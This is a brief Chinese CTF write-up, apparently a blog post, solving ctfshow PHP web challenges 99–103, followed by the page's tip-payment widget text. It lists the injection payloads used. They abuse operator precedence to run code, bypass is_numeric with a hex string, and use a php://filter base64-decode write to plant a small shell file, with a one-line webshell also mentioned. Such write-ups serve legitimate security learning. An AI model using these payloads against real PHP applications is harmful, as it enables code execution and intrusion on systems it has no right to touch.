php/web(99-103)

99.至少可以确定1在随机数中,可以输入1.php。(部分其他数也可以)

100.通过优先级:&& > = > and,使v1仅赋值数字通过。(?v1=1&v2=var_dump($ctfshow)/*&v3=*/; )

将一句话木马写入。

查看目录

找到flag目录并访问

101.利用反射类绕过(?v1=143&v2=echo new ReflectionClass&v3=;)

102.103.使用伪协议将v3用base64写入,

再使用十六进制{00(--读取位置为第二位)5044383959474e6864434171594473}既保证v2为数字又含e被认为为科学计数法绕过is_numeric。

(?v2=005044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=wuzheyu.php)

(v1=hex2bin)

传参后访问(wuzheyu.php)查看源码即可。

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值